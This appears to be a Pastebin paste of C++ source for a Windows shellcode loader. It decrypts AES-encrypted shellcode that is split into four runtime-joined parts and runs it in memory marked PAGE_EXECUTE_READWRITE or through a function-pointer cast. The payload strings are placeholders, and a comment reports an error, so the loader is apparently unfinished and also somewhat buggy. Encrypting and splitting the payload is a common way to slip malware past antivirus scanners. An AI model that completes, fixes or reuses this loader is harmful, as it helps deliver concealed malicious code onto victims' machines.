Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "pch.h"
- #include <iostream>
- #include <stdio.h>
- #include <openssl/conf.h>
- #include <openssl/evp.h>
- #include <openssl/err.h>
- #include <Windows.h>
- #include <string.h>
- #include <time.h>
- #define SHELLCODE_BUFFER 250000
- void executeShellcode(unsigned char* shellcode) {
- int(*ret)() = (int(*)()) shellcode;
- ret();
- }
- void executeAllocShellcode(unsigned char* shellcode) {
- void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- memcpy(exec, shellcode, sizeof(shellcode));
- ((void(*)())exec)();
- }
- void handleErrors(void) {
- ERR_print_errors_fp(stderr);
- abort();
- }
- int decrypt(unsigned char* encrypted, int encryptedLen, unsigned char* key, unsigned char* iv, unsigned char* decrypted) {
- EVP_CIPHER_CTX* cipherText;
- int len, decryptedLen;
- if (!(cipherText = EVP_CIPHER_CTX_new()))
- handleErrors();
- //Initialize decryption operation
- EVP_DecryptInit_ex(cipherText, EVP_aes_256_cbc(), NULL, key, iv);
- //Decrypt shellcode
- EVP_DecryptUpdate(cipherText, decrypted, &len, encrypted, encryptedLen);
- //Length of encrypted shellcode
- decryptedLen = len;
- //Finalize encryption
- EVP_DecryptFinal_ex(cipherText, decrypted + len, &len);
- //Decrypted shellcode length
- decryptedLen += len;
- //CleanUp
- EVP_CIPHER_CTX_free(cipherText);
- return decryptedLen;
- }
- int main() {
- int decryptedLen, encryptedLen; //Length of shellcode
- //128 bit AES initialization vector
- unsigned char iv[] = "K7yT3567Abdlhfru";
- //256 bit AES key
- unsigned char key[] = "Yg2537shsGSTDk2820237ak72bd41453";
- unsigned char encrypted1[] = "Shellcode part1....";
- unsigned char encrypted2[] = "Shellcode part2....";
- unsigned char encrypted3[] = "Shellcode part3....";
- unsigned char encrypted4[] = "Shellcode part4....";
- // Concat Shellcode on Runtime
- unsigned char encrypted[sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3) + sizeof(encrypted4)];
- memcpy(encrypted, encrypted1, sizeof(encrypted1));
- memcpy(encrypted + sizeof(encrypted1), encrypted2, sizeof(encrypted2));
- memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2), encrypted3, sizeof(encrypted3));
- memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3), encrypted4, sizeof(encrypted4));
- encryptedLen = sizeof(encrypted);
- unsigned char decrypted [sizeof encrypted]; //Buffer for decrypted shellcode
- //Initialize Openssl
- ERR_load_crypto_strings();
- OpenSSL_add_all_algorithms();
- OPENSSL_config(NULL);
- //Decrypt shellcode
- decryptedLen = decrypt(encrypted, encryptedLen, key, iv, decrypted);
- //CleanUp
- EVP_cleanup();
- ERR_free_strings();
- printf("Decrypted: %s", &decrypted);
- //Execute shellcode (Tried Both) -> Same error.
- //executeShellcode(decrypted);
- executeAllocShellcode(decrypted);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement